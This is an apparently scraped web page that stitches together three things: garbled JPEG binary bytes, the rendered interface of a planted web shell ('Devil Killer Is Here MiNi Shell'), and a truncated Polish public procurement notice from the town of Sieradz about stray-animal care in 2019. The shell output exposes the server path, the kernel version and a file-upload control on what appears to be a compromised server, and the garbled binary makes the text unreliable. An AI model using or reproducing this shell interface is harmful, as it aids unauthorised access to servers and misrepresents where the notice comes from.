JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20181207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20181207/659173-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 659173-N-2018 z dnia 2018-12-07 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Miasto Sieradz</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Usługi związane z ochroną przed bezdomnymi zwierzętami na terenie Miasta Sieradza w 2019 r.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Miasto Sieradz</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">73093433500000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">plac Wojewódzki</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">98200 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Sieradz</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">łódzkie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">43 826 61 28</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">zamowienia@umsieradz.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">43 822 30 05</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.sieradz.eu</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.umsieradz.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.umsieradz.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Zamawiający wymaga, aby oferty były składane pod rygorem nieważności w formie pisemnej. Decydujące znaczenie dla oceny zachowania terminu składania ofert ma data i godzina wpływu oferty do Zamawiającego, a nie data wysłania przesyłką pocztową lub kurierską.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Miasta Sieradza, 98-200 Sieradz, plac Wojewódzki 1</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Usługi związane z ochroną przed bezdomnymi zwierzętami na terenie Miasta Sieradza w 2019 r.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">WOR-Z.271.54.2018</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">3</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Przedmiot zamówienia obejmuje następujące zadania:1) wyłapywanie i utrzymywanie bezdomnych psów z terenu miasta Sieradza:a) wyłapywanie bezdomnych psów z terenu miasta Sieradza oraz ich dostarczenie do schroniska, w tym:-	wyłapywanie bezdomnych psów z terenu Miasta Sieradza i transport psów do schroniska prowadzonego przez Wykonawcę (podjęcie natychmiastowych działań maksymalnie w ciągu 1 godz. od zgłoszenia) po uprzednim poinformowaniu o tym zdarzeniu Referatu Ekologii i Ochrony Środowiska Urzędu Miasta Sieradza, a w godzinach popołudniowych i wieczornych bądź w soboty, niedziele i święta - Straży Miejskiej w Sieradzu - nie więcej niż 100 psów w okresie obowiązywania umowy,-	przekazanie natychmiastowej informacji o wyłapanym zwierzęciu (wraz z co najmniej jednym zdjęciem psa i informacją o miejscu wyłapania) Zamawiającemu, Straży Miejskiej w Sieradzu oraz współpracującym organizacjom pozarządowym działającym w zakresie ochrony zwierząt - informacje powyższe powinny zostać przekazane drogą elektroniczną na adresy podane przez Zamawiającego i ww. organizacje pozarządowe w ciągu 1 godziny od momentu dostarczenia psa do schroniska, -	prowadzenie fanpage przez Wykonawcę w ramach serwisu społecznościowego Facebook oraz umieszczanie zdjęć i opisu wyłapanego psa wraz z informacją o miejscu wyłapania na ww. stronie w ciągu 1 godziny od momentu dostarczenia psa do schroniska,-	utrzymywanie wyłapanych psów w schronisku przez okres do 24 h od momentu dostarczenia psa do schroniska w celu umożliwienia właścicielom odebrania wyłapanego psa,-	bezzwłoczne skontaktowanie się z właścicielem psa w przypadku posiadania przez zwierzę czipa lub innego identyfikatora,-	podejmowanie działań w celu odnalezienia właściciela wyłapanego psa we współpracy z Referatem Ekologii i Ochrony Środowiska Urzędu Miasta Sieradza oraz z lokalnymi organizacjami pozarządowymi, prowadzącymi w ramach swojej działalności statutowej działania w zakresie ochrony zwierząt,-	przekazanie psa właścicielowi najpóźniej w ciągu 24 h od momentu dostarczenia psa do schroniska,-	założenie i prowadzenie ewidencji wyłapanych psów, -	przeprowadzenie badania klinicznego,-	zaczipowanie każdego psa nieposiadającego czipa w terminie nieprzekraczającym 5 h od momentu jego dostarczenia do schroniska;b) utrzymywanie psów wyłapanych z terenu miasta Sieradza w schronisku przez okres obowiązywania umowy, jednakże nie dłużej niż do czasu ich odebrania przez właściciela, zaadoptowania lub upadku ostatniego z przetrzymywanych psów, w tym:o	zapewnienie opieki nad psami w schronisku, przy czym opieka ta odbywać się musi z zachowaniem następujących zasad:-	w schronisku nie powinno przebywać jednorazowo więcej niż 900 zwierząt,-	schronisko winno posiadać minimum 5 wybiegów oraz zapewniać zwierzętom spacery,-	w boksach przeznaczonych dla psów z terenu Miasta Sieradza nie może przebywać jednorazowo więcej niż 2 psy,-	psy muszą być umieszczone w boksach, które zapewniają im możliwość swobodnego przemieszczania się, ochronę przed negatywnym wpływem warunków atmosferycznych i odpowiednie oświetlenie,-	psy agresywne muszą być oddzielone od psów nieposiadających takich cech,-	psy i suki niepoddane zabiegowi sterylizacji muszą być ulokowane w pojedynczych boksach; dopuszcza się umieszczenie ich z drugim psem wysterylizowanym,-	szczeniaki muszą być oddzielone od psów dorosłych, za wyjątkiem umieszczenia szczeniaków z matką,-	każdy kojec musi być opisany w celu umożliwienia identyfikacji psa, który jest przypisany w dokumentacji schroniska do danego boksu,-	należy dobierać psy w boksach tak, by zminimalizować ryzyko pogryzień,-	psy muszą otrzymywać odpowiednią ilość odpowiedniej karmy oraz mieć całodobowy dostęp do świeżej wody pitnej,-	poza wykwalifikowanym personelem pomoc w wyprowadzaniu psów na spacer może być sprawowana przez wolontariuszy, w szczególności z współpracujących ze schroniskiem organizacji pozarządowych działających w zakresie ochrony zwierząt,-	schronisko w porozumieniu z upoważnionym pracownikiem Referatu Ekologii i Ochrony Środowiska Urzędu Miasta Sieradza może przekazać psa, który ma problemy z adaptacją w schronisku lub problemy behawioralne, czasowo (na okres nie dłuższy niż pół roku) do domu tymczasowego,o	zapewnienie opieki weterynaryjnej nad psami w schronisku, przy czym opieka ta odbywać się musi z zachowaniem następujących zasad:-	schronisko przeprowadza prewencyjną 14-dniową kwarantannę po upływie 24 h od momentu dostarczenia psa do schroniska,-	psy mają wykonywane niezbędne szczepienia przeciwko chorobom zakaźnym, w tym wściekliźnie,-	schronisko zapewnia wykonywanie profilaktyki leczniczej i leczenia,-	schronisko przeprowadza obserwację psa, co do którego istnieje podejrzenie o zarażenie wścieklizną, po ugryzieniu człowieka lub zwierzęcia,-	schronisko prowadzi profilaktykę oraz zwalcza pasożyty wewnętrzne i zewnętrzne,-	schronisko zapewnia całodobowy dyżur weterynaryjny,-	schronisko zobowiązane jest do przeprowadzania usypiania ślepych miotów, wykonywania sterylizacji aborcyjnych i w szczególnych przypadkach eutanazji (nieuleczalnie chorych i cierpiących psów, wobec których nie ma możliwości zastosowania skutecznego leczenia) w uzgodnieniu z upoważnionym pracownikiem Referatu Ekologii i Ochrony Środowiska Urzędu Miasta Sieradza oraz z lekarzem weterynarii,-	schronisko przeprowadza kastrację i sterylizację każdego z nowo przybyłych psów w terminie nie krótszym niż 14 dni od daty dostarczenia zwierzęcia do schroniska i nie dłuższym niż 30 dni od momentu dostarczenia do schroniska, chyba że istnieją przeciwwskazania określone przez lekarza weterynarii lub istnieje prawdopodobieństwo odbioru psa przez właściciela,-	schronisko zobowiązane jest dbać o wygląd zewnętrzny psa, w tym o pielęgnację sierści,-	schronisko zapewnia socjalizację psów,o	współpraca z Referatem Ekologii i Ochrony Środowiska Urzędu Miasta Sieradza oraz z lokalnymi organizacjami pozarządowymi, prowadzącymi w ramach swojej działalności statutowej działania w zakresie ochrony zwierząt w zakresie działań mających na celu odnajdywanie właścicieli zwierząt oraz adopcję i promocję opieki nad zwierzętami poprzez:-	zamieszczanie na prowadzonych przez siebie stronach, portalach internetowych, kontach na serwisach społecznościowych i ogłoszeniowych ogłoszeń, informacji dotyczących nowoprzybyłych zwierząt z podaniem miejsca wyłapania zwierzęcia,-	systematyczne umieszczanie zdjęć i danych zwierząt przebywających w schronisku na prowadzonej stronie internetowej oraz na stronie fanpage Wykonawcy prowadzonej w ramach serwisu społecznościowego Facebook,-	poszukiwanie chętnych do zaadoptowania zwierząt,-	przeprowadzanie adopcji zwierząt we współpracy z upoważnionymi przedstawicielami Zamawiającego,-	przeprowadzanie wizyty przed i po adopcyjnych,-	uczestnictwo w akcjach promujących adopcje organizowanych przez Zamawiającego,-	nawiązywanie współpracy z fundacjami i stowarzyszeniami w zakresie promocji i adopcji zwierząt.o	sporządzanie i przekazywanie Zamawiającemu miesięcznych sprawozdań i zestawień psów z terenu gminy Miasta Sieradza przebywających w schronisku, wyłapanych, oddanych właścicielowi, przekazanych do adopcji, poddanych eutanazji, padłych, poddanych sterylizacji i kastracji. c) transport psów odebranych z dotychczasowego schroniska do schroniska docelowego Wykonawcy:transport bezdomnych psów (około 50 szt.) znajdujących się obecnie w schronisku: Przytulisko i Hotel Dla Zwierząt Domowych "FUNNY PETS", 98-200 Sieradz Czartki 49B, do schroniska prowadzonego przez Wykonawcę - w terminie 3 dni od daty zawarcia umowy.2) sterylizacja kotek (maksymalnie 40 szt.) i kastracja kocurów (maksymalnie 15 szt.) wolno żyjących wraz z czipowaniem, w tym:a) przybycie na miejsce wskazane przez przedstawiciela Zamawiającego, w którym przebywają tymczasowo koty wolno żyjące i ich zabranie do gabinetu weterynaryjnego, w którym wykonywane będą zabiegi; przyjazd i zabranie kota do gabinetu powinny nastąpić w terminie nie dłuższym niż 1 dzień od daty zgłoszenia przez Zamawiającego. Wykonawca będzie zobowiązany przez Zamawiającego do przyjazdu, gdy do odbioru będzie co najmniej 1 kot,b) wykonania zabiegów sterylizacji kotek i kastracji kotów wolno żyjących z odrobaczeniem, odpchleniem, wszczepieniem czipa oraz dwudniowym okresem rekonwalescencji po zabiegu; dotyczy również kotek i kocurów wolno żyjących dostarczonych do gabinetu przez osoby trzecie; po wykonaniu zabiegu i okresie rekonwalescencji koty należy przetransportować w miejsce, z którego zostały zabrane,d) prowadzenia ewidencji osób, które dostarczyły kotki lub kocury do sterylizacji i kastracji,e) prowadzenia ewidencji ilości wykonanych zabiegów,f) zapewnienia jak najlepszych warunków przechowywania kotów w gabinecie, tj. przetrzymywania w klatkach odpowiednio przystosowanych i zapewniających komfort poruszania się zwierzęcia,g) miejsce wykonywania zabiegów może być oddalone od miasta Sieradza nie więcej niż 20 km,h) informowanie Zamawiającego o czasie i miejscu zwrotu kota.3) zapewnienie całodobowej opieki weterynaryjnej w przypadkach zdarzeń drogowych z udziałem zwierząt - (maksymalnie 30 szt.), w tym: a) przybycie na miejsce (zdarzenia drogowego z udziałem zwierząt, o każdej porze dnia i nocy) wskazane przez przedstawiciela Zamawiającego, także przedstawiciela Straży Miejskiej w Sieradzu lub Policji i zabranie do gabinetu weterynaryjnego zwierzęcia uległego wypadkowi; przyjazd i zabranie zwierzęcia do gabinetu powinno nastąpić możliwie jak najszybciej, w terminie nie dłuższym niż 60 minut od momentu otrzymania zgłoszenia,b) przyjęcie zwierzęcia uległego wypadkowi (o każdej porze dnia i nocy) na drodze przez osobę dostarczającą, po uzgodnieniu z przedstawicielem Zamawiającego lub innym uprawnionym podmiotem,c) wykonania niezbędnych zabiegów i przetrzymanie w gabinecie z trzydniowym okresem rekonwalescencji po udzieleniu pomocy oraz zaczipowanie zwierzęcia,d) prowadzenia ewidencji osób, które dostarczyły zwierzęta ulegle wypadkowi,e) prowadzenia ewidencji wykonanych zabiegów,f) zapewnienia jak najlepszych warunków przechowywania w gabinecie tj. przetrzymywania w klatkach odpowiednio przystosowanych i zapewniających komfort poruszania się zwierzęcia do momentu odebrania ich do miejsca docelowego przetrzymania,g) transport zwierzęcia uległego wypadkowi 4-go dnia od zdarzenia drogowego do schroniska, z którym Zamawiający posiada podpisaną umowę dotyczącą utrzymania psów z terenu Miasta Sieradza lub w inne miejsce wskazane przez Zamawiającego,h) współpraca z wolontariuszami i z lokalną organizacją działającą w zakresie ochrony zwierząt,i) sporządzanie i przekazywanie Zamawiającemu miesięcznych sprawozdań i zestawień zwierząt uległych wypadkom, którym udzielono pomocy z podaniem osoby zgłaszającej zdarzenie drogowe, miejsca zdarzenia, dokładnego opisu zwierzęcia, w tym opisu doznanego urazu.2. Chipy zapewnia:- dla części nr 1 i 3 zamówienia - Wykonawca,- dla części nr 2 zamówienia - Zamawiający.3. Zamawiający wymaga zatrudnienia przez Wykonawcę lub Podwykonawcę na podstawie umowy o pracę osób wykonujących następujące czynności w zakresie realizacji zamówienia, które polegają na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. Kodeks pracy (Dz. U. z 2018 r. poz. 917 z późniejszymi zmianami):- opiekuna zwierząt (dotyczy części nr 1 i 3 zamówienia),- ratownika weterynaryjnego (dotyczy części nr 1 i 3 zamówienia),- nadzoru lekarsko-weterynaryjnego (dotyczy części nr 1, 2 i 3 zamówienia).</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">85210000-3</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - 